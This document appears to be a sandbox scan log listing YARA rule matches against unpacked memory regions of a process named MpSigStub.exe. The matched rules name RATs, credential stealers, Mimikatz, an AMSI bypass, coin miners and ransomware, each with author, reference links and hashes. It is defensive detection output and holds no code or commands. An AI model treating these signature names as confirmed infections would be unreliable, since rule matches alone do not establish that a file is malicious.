Source: 36.3.MpSigStub.exe.197a47aa096.59.raw.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a497a30f.132.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a497a30f.132.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: GoldDragon_RunnignRAT date = 2018-02-03, hash3 = 98ccf3a463b81a47fdf4275e228a8f2266e613e08baae8bdcd098e49851ed49a, hash2 = 5cbc07895d099ce39a3142025c557b7fac41d79914535ab7ffc2094809f12a4b, hash1 = 94aa827a514d7aa70c404ec326edaaad4b2b738ffaea5a66c0c9f246738df579, author = Florian Roth, description = Detects Running RAT malware from Gold Dragon report, reference = https://goo.gl/rW1yvZ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE Matched rule: pdb_strings_Rescator date = 01/30/2014, author = @patrickrolsen, maltype = Target Attack, description = Rescator PDB strings within binaries, version = 0.3
Source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a46f017a.58.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4fa8d92.116.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: 36.3.MpSigStub.exe.197a4f45162.112.raw.unpack, type: UNPACKEDPE Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407fe9d.110.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a407e899.111.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407e899.111.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.95.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a33b6aa2.66.raw.unpack, type: UNPACKEDPE Matched rule: Unspecified_Malware_Sep1_A1 date = 2017-09-12, hash1 = 28143c7638f22342bff8edcd0bedd708e265948a5fcca750c302e2dca95ed9f0, author = Florian Roth, description = Detects malware from DrqgonFly APT report, reference = https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.unpack, type: UNPACKEDPE Matched rule: MAL_Turla_Agent_BTZ date = 2018-04-12, hash1 = c4a1cd6916646aa502413d42e6e7441c6e7268926484f19d9acbf5113fc52fc8, author = Florian Roth, description = Detects Turla Agent.BTZ, reference = https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a36f3b2a.215.unpack, type: UNPACKEDPE Matched rule: dump_tool author = @patrickrolsen, reference = Related to pwdump6 and fgdump tools
Source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a32a2a79.180.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 36.3.MpSigStub.exe.197a37e91da.72.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: CredentialStealer_Generic_Backdoor date = 2017-06-07, hash1 = edb2d039a57181acf95bd91b2a20bd9f1d66f3ece18506d4ad870ab65e568f2c, author = Florian Roth, description = Detects credential stealer byed on many strings that indicate password store access, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa658a.115.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a46f017a.26.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a48adbfa.121.unpack, type: UNPACKEDPE Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 36.3.MpSigStub.exe.197a407fe9d.125.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 36.3.MpSigStub.exe.197a4fa798e.114.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT29_sorefang_modify_alphabet_custom_encode author = NCSC, description = Rule to detect SoreFang based on arguments passed into custom encoding algorithm function, reference = https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development, hash = 58d8e65976b53b77645c248bfa18c3b87a6ecfb02f306fe6ba4944db96a5ede2
Source: 36.3.MpSigStub.exe.197a3f2f03e.60.raw.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a37e9bde.71.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a3e184e5.98.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
